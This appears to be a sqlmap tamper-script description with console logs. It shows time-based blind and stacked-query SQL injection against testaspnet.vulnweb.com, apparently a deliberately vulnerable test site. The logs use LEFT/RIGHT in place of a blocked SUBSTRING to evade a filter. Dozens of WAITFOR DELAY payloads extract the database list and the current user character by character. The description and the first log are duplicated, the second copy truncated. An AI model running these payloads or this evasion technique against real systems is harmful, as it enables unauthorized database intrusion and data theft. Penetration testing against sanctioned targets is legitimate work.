I encountered that MSSQL SUBSTRING function was blocked by some kind of security control. So, I've utilized another substring-like function of MSSQL instead (LEFT and RIGHT).
Test run (verbose suppressed)
root@kali:~# sqlmap -uhttp://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --threads 10 --dbs
(…snip…)
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=3;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blind (IF)Payload: id=3 WAITFOR DELAY '0:0:5'
[11:48:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:48:48] [INFO] testing Microsoft SQL Server
[11:48:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[11:48:55] [INFO] confirming Microsoft SQL Server
[11:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[11:49:18] [INFO] fetching database names
[11:49:18] [INFO] fetching number of databases
[11:49:18] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:49:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
1
[11:49:57] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:50:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:50:42] [INFO] retrieved: acublog
[11:52:40] [INFO] retrieved: master
[11:54:22] [INFO] retrieved: tempdb
[11:56:29] [INFO] retrieved: model
[11:58:13] [INFO] retrieved: ms
[11:59:26] [ERROR] invalid character detected. retrying..
[11:59:26] [WARNING] increasing time delay to 6 seconds
db
[12:00:02] [INFO] retrieved: acublog
[12:02:21] [INFO] retrieved: acuservice
[12:05:21] [INFO] retrieved: acuf
[12:06:48] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[12:06:49] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[12:06:49] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
orum
[12:09:55] [INFO] retrieved:
available databases [7]:
[] acublog
[] acuforum
[] acuservice
[] master
[] model
[] msdb
[*] tempdb
[12:09:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:09:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
Test run
root@kali:~# sqlmap -uhttp://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --current-user -v3
(...snip...)
[12:26:56] [INFO] fetching current user
[12:26:56] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:4'
[12:27:01] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:4'
[12:27:08] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>108) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>106) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>105) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=105) WAITFOR DELAY '0:0:4'
[12:27:14] [ERROR] invalid character detected. retrying..
[12:27:14] [WARNING] increasing time delay to 5 seconds
[12:27:14] [DEBUG] turning off time auto-adjustment mechanism
[12:27:14] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:5'
[12:27:19] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:24] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>97) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=97) WAITFOR DELAY '0:0:5'
[12:27:27] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>99) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))!=99) WAITFOR DELAY '0:0:5'
[12:27:39] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:44] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:49] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>120) WAITFOR DELAY '0:0:5'
[12:27:50] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>116) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>118) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))!=117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:01] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:02] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:07] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>108) WAITFOR DELAY '0:0:5'
[12:28:12] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>110) WAITFOR DELAY '0:0:5'
[12:28:13] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>109) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))!=110) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>100) WAITFOR DELAY '0:0:5'
[12:28:29] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>102) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))!=101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:36] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>120) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>116) WAITFOR DELAY '0:0:5'
[12:28:42] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>114) WAITFOR DELAY '0:0:5'
[12:28:47] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>115) WAITFOR DELAY '0:0:5'
[12:28:52] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))!=116) WAITFOR DELAY '0:0:5'
[12:28:53] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>104) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>108) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>106) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))!=105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:10] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>112) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>120) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>116) WAITFOR DELAY '0:0:5'
[12:29:21] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>118) WAITFOR DELAY '0:0:5'
[12:29:27] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>119) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))!=120) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>48) WAITFOR DELAY '0:0:5'
[12:29:33] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>1) WAITFOR DELAY '0:0:5'
[12:29:33] [INFO] retrieved: acunetix
[12:29:33] [DEBUG] performed 68 queries in 156.57 seconds
current user: 'acunetix'
[12:29:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:29:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
[*] shutting down at 12:29:33
I encountered that MSSQL SUBSTRING function was blocked by some kind of security control. So, I've utilized another substring-like function of MSSQL instead (LEFT and RIGHT).
Test run (verbose suppressed)
root@kali:~# sqlmap -uhttp://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --threads 10 --dbs
(…snip…)
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=3;WAITFOR DELAY '0:0:5'--
[11:48:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:48:48] [INFO] testing Microsoft SQL Server
[11:48:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[11:48:55] [INFO] confirming Microsoft SQL Server
[11:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[11:49:18] [INFO] fetching database names
[11:49:18] [INFO] fetching number of databases
[11:49:18] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:49:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
1
[11:49:57] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:50:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:50:42] [INFO] retrieved: acublog
[11:52:40] [INFO] retrieved: master
[11:54:22] [INFO] retrieved: tempdb
[11:56:29] [INFO] retrieved: model
[11:58:13] [INFO] retrieved: ms
[11:59:26] [ERROR] invalid character detected. retrying..
[11:59:26] [WARNING] increasing time delay to 6 seconds
db
[12:00:02] [INFO] retrieved: acublog
[12:02:21] [INFO] retrieved: acuservice
[12:05:21] [INFO] retrieved: acuf
[12:06:48] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[12:06:49] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[12:06:49] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
orum
[12:09:55] [INFO] retrieved:
available databases [7]:
[] acublog
[] acuforum
[] acuservice
[] master
[] model
[] msdb
[*] tempdb
[12:09:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
